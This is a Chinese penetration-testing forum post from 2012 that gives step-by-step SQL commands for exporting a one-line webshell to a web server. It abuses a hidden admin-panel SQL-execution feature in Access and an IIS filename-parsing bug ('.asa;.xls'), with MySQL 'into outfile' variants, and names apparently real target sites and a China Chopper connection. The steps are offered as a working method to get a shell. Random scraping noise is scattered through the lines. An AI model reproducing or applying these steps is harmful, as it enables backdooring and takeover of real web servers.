中国网络渗透测试联盟

标题: ACCESS执行SQL命令导出一句话SHELL [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
6 |( k) v* v, R% I) C4 b* awebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
$ M. P) D- H1 B, m文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,4 N8 e% F2 W5 `" C2 z
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
+ T  ~9 C! V* \+ }5 v1.create table cmd (a varchar(50))7 a  v2 h, K' K# l# w
2.insert into cmd (a) values (‘‘)
& ]5 Y3 s7 }! t% i) G- E+ q3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd; |- W+ z2 n. b" U
(把表cmd的内容导出为物理路径的一个EXCEL文件)9 }) b3 g4 p1 b7 f
4.drop table cmd
6 Y1 \1 u9 \7 t5 v" p利用IIS的BUG成功拿到了WEBSHELL。
; Q" Y- i# Y8 ]5 b# p5 @  ^; E
+ y2 y9 G$ A4 ?* I3 \( c' X% p( e直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
4 s4 H+ f- D0 x# g* ]' F- |0 o) T% T4 q3 h2 J
  SQL语句意思解释:
8 l- s1 {6 N1 _& J) Z  第一句
# V( d2 C0 X( V3 t" @5 K: R  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
4 K. h5 ~5 ?1 t9 r2 }, J& E3 Q) q& |' J" `
  第二句
* T# X% c  i, s0 W  在表cmd的a字段插入一句话木马( f: K0 L7 [. ?) \
  第三句4 _9 y& j3 ?7 F. ~7 u  A2 t
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
0 D7 R% ~# A/ n9 k4 u7 n
& j( T3 n$ u  n5 h" I7 C  第四句5 P* w8 g* r7 h) y, @
  删除建立的cmd表2 L, X; B( [' `* @( N3 R

& T$ A1 x0 D9 O6 ?: w  以下内容为测试:( Q& k  G3 u- o
  Access利用后台SQL执行命令功能导出WebShell:
! V. m' Y& [" y3 W' G  这个更简单:
* O3 c) P( U9 U! l- {( A  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]% P% O% P. N3 v2 z" H
  或者- W) y+ x( j5 c; C0 [3 N. Y
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
5 U. h, m, K7 h, \6 ^4 N/ u
  C. n" ^0 w* s( ?/ b- b  后台有执行SQL语句功能(vote为已知表段)' f7 n! M" l. L1 C9 C, v! p
  希望对大家有所帮助拿shell的又一个思路
$ h" ?8 W7 d7 b" B" b




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2